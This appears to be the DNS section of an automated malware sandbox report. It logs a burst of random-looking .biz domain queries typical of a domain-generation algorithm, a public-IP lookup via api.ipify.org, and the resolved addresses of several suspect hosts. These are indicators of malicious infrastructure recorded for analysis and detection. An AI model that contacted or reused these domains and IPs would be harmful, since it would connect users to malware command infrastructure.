                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.528505087 CET192.168.2.51.1.1.10xe55fStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233856916 CET192.168.2.51.1.1.10x1b73Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.483865023 CET192.168.2.51.1.1.10xbb5dStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.646476030 CET192.168.2.51.1.1.10x37f2Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.718158960 CET192.168.2.51.1.1.10xbd18Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.665539026 CET192.168.2.51.1.1.10xcb0aStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.135319948 CET192.168.2.51.1.1.10xe2afStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.091712952 CET192.168.2.51.1.1.10x7faStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.364371061 CET192.168.2.51.1.1.10xff65Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.052037954 CET192.168.2.51.1.1.10x5d5fStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.164278030 CET192.168.2.51.1.1.10xaf38Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.055524111 CET192.168.2.51.1.1.10x79c7Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.024507046 CET192.168.2.51.1.1.10x30e9Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.532598019 CET192.168.2.51.1.1.10xa6ddStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.898556948 CET192.168.2.51.1.1.10x240fStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.234920025 CET192.168.2.51.1.1.10xa075Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.792285919 CET192.168.2.51.1.1.10x7d01Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.120327950 CET192.168.2.51.1.1.10x66a6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.987751961 CET192.168.2.51.1.1.10xa945Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.487055063 CET192.168.2.51.1.1.10xb564Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.498161077 CET192.168.2.51.1.1.10xcbfdStandard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.704293013 CET192.168.2.51.1.1.10xe397Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.588159084 CET192.168.2.51.1.1.10xad45Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.478523970 CET192.168.2.51.1.1.10x94a9Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.617386103 CET192.168.2.51.1.1.10x19Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.373764992 CET192.168.2.51.1.1.10xd28Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.551839113 CET192.168.2.51.1.1.10xb9d0Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:52.236449003 CET192.168.2.51.1.1.10xf119Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.126338959 CET192.168.2.51.1.1.10x648cStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.207159996 CET192.168.2.51.1.1.10xa969Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.091474056 CET192.168.2.51.1.1.10xfd3dStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.290914059 CET192.168.2.51.1.1.10x9b6dStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.619719982 CET192.168.2.51.1.1.10x15cdStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.060746908 CET192.168.2.51.1.1.10x8e94Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.371138096 CET192.168.2.51.1.1.10x5ff2Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.107423067 CET192.168.2.51.1.1.10x85a8Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.831684113 CET192.168.2.51.1.1.10xb077Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.692895889 CET192.168.2.51.1.1.10x93a8Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.701263905 CET192.168.2.51.1.1.10xec28Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.944513083 CET192.168.2.51.1.1.10x3309Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.626079082 CET192.168.2.51.1.1.10x8472Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.951447964 CET192.168.2.51.1.1.10x68c9Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.524188995 CET192.168.2.51.1.1.10xe3daStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.103015900 CET192.168.2.51.1.1.10x2c83Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.013895988 CET192.168.2.51.1.1.10x30adStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.487845898 CET192.168.2.51.1.1.10x3e2fStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.476198912 CET192.168.2.51.1.1.10x28d9Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.505700111 CET192.168.2.51.1.1.10x8666Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.401951075 CET192.168.2.51.1.1.10x6870Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.174323082 CET192.168.2.51.1.1.10x5a93Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.884598017 CET192.168.2.51.1.1.10xd09eStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.536395073 CET192.168.2.51.1.1.10xb0a1Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.352451086 CET192.168.2.51.1.1.10xb64dStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.235344887 CET192.168.2.51.1.1.10x1981Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.343311071 CET192.168.2.51.1.1.10xec9aStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.951394081 CET192.168.2.51.1.1.10xcf4Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.366568089 CET192.168.2.51.1.1.10x15fStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.375380993 CET192.168.2.51.1.1.10x734bStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956511021 CET192.168.2.51.1.1.10x82c0Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.017071962 CET192.168.2.51.1.1.10xd3f8Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.390666008 CET192.168.2.51.1.1.10xb5e9Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.965646029 CET192.168.2.51.1.1.10x5b9fStandard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.649671078 CET192.168.2.51.1.1.10x441Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.453170061 CET192.168.2.51.1.1.10xbdfaStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.323932886 CET192.168.2.51.1.1.10xebccStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.707663059 CET192.168.2.51.1.1.10xe8ffStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.802061081 CET192.168.2.51.1.1.10x8890Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.503251076 CET192.168.2.51.1.1.10x4ad6Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.515969038 CET192.168.2.51.1.1.10x2f96Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.526822090 CET192.168.2.51.1.1.10x5dd6Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.009558916 CET192.168.2.51.1.1.10xc883Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.319135904 CET192.168.2.51.1.1.10x654fStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.224877119 CET192.168.2.51.1.1.10x17b1Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.276974916 CET192.168.2.51.1.1.10x82dfStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.685724020 CET192.168.2.51.1.1.10x4f8aStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.250890017 CET192.168.2.51.1.1.10x3aeeStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.133065939 CET192.168.2.51.1.1.10x89c6Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.596529007 CET192.168.2.51.1.1.10x5b9eStandard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.825728893 CET192.168.2.51.1.1.10xa471Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.686299086 CET192.168.2.51.1.1.10xb823Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.874140978 CET192.168.2.51.1.1.10x5acStandard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.369508028 CET192.168.2.51.1.1.10xa20bStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.391041040 CET192.168.2.51.1.1.10xa20bStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.403426886 CET192.168.2.51.1.1.10x6a7Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.691330910 CET192.168.2.51.1.1.10x7b11Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.438965082 CET192.168.2.51.1.1.10xec72Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.972167015 CET192.168.2.51.1.1.10x2e7cStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.000943899 CET192.168.2.51.1.1.10x2e7cStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.958950043 CET192.168.2.51.1.1.10x163Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.783652067 CET192.168.2.51.1.1.10x9969Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.957281113 CET192.168.2.51.1.1.10x2644Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.717144012 CET192.168.2.51.1.1.10x8971Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.418822050 CET192.168.2.51.1.1.10x7ac4Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.124756098 CET192.168.2.51.1.1.10xaf1Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.564261913 CET192.168.2.51.1.1.10x8fe2Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.612049103 CET192.168.2.51.1.1.10xec4dStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.048798084 CET192.168.2.51.1.1.10x6085Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.515948057 CET192.168.2.51.1.1.10x57f2Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.544069052 CET192.168.2.51.1.1.10x57f2Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.479283094 CET192.168.2.51.1.1.10xe81Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.931953907 CET192.168.2.51.1.1.10x9d2bStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.190994978 CET192.168.2.51.1.1.10x5cb0Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.315975904 CET192.168.2.51.1.1.10xca55Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401820898 CET192.168.2.51.1.1.10x251dStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.064976931 CET192.168.2.51.1.1.10x50f2Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.560924053 CET192.168.2.51.1.1.10x9cf0Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.076721907 CET192.168.2.51.1.1.10xa6b8Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.123025894 CET192.168.2.51.1.1.10x3b44Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.127002001 CET192.168.2.51.1.1.10xae00Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.994302988 CET192.168.2.51.1.1.10x1f08Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.397239923 CET192.168.2.51.1.1.10x2d56Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.868808031 CET192.168.2.51.1.1.10x5c20Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.888591051 CET192.168.2.51.1.1.10x5c20Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.646270990 CET192.168.2.51.1.1.10xc4afStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.669039011 CET192.168.2.51.1.1.10xc4afStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.230670929 CET192.168.2.51.1.1.10x25c9Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.912559986 CET192.168.2.51.1.1.10xf3cbStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.921050072 CET192.168.2.51.1.1.10xe174Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.947117090 CET192.168.2.51.1.1.10x4c71Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.270217896 CET192.168.2.51.1.1.10x82d6Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.429977894 CET192.168.2.51.1.1.10x905bStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.114244938 CET192.168.2.51.1.1.10x9a05Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.143317938 CET192.168.2.51.1.1.10xf25dStandard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.223953962 CET192.168.2.51.1.1.10x9490Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.234467030 CET192.168.2.51.1.1.10x8776Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.570362091 CET192.168.2.51.1.1.10x4c62Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.309362888 CET192.168.2.51.1.1.10xe021Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.421881914 CET192.168.2.51.1.1.10x7045Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.768788099 CET192.168.2.51.1.1.10x6544Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.455437899 CET192.168.2.51.1.1.10x647cStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.623599052 CET192.168.2.51.1.1.10x2a6aStandard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.308132887 CET192.168.2.51.1.1.10x2200Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.868285894 CET1.1.1.1192.168.2.50x2544No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.868285894 CET1.1.1.1192.168.2.50x2544No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.868285894 CET1.1.1.1192.168.2.50x2544No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.102154016 CET1.1.1.1192.168.2.50x8222No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.901848078 CET1.1.1.1192.168.2.50xde78No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.011610031 CET1.1.1.1192.168.2.50x502bNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.015423059 CET1.1.1.1192.168.2.50xc2aeNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.560060024 CET1.1.1.1192.168.2.50x533No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.500272036 CET1.1.1.1192.168.2.50x34edNo error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.709403038 CET1.1.1.1192.168.2.50x1cafNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.058176041 CET1.1.1.1192.168.2.50xe3d6No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.058176041 CET1.1.1.1192.168.2.50xe3d6No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.280885935 CET1.1.1.1192.168.2.50xe7d8No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.095355034 CET1.1.1.1192.168.2.50xe635No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.095355034 CET1.1.1.1192.168.2.50xe635No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.455214977 CET1.1.1.1192.168.2.50x47a3Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.463573933 CET1.1.1.1192.168.2.50x6ff7No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.737462997 CET1.1.1.1192.168.2.50xfb1fName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.747247934 CET1.1.1.1192.168.2.50x4014No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.942096949 CET1.1.1.1192.168.2.50x2b18Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.950407028 CET1.1.1.1192.168.2.50x287aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.958466053 CET1.1.1.1192.168.2.50xe885No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
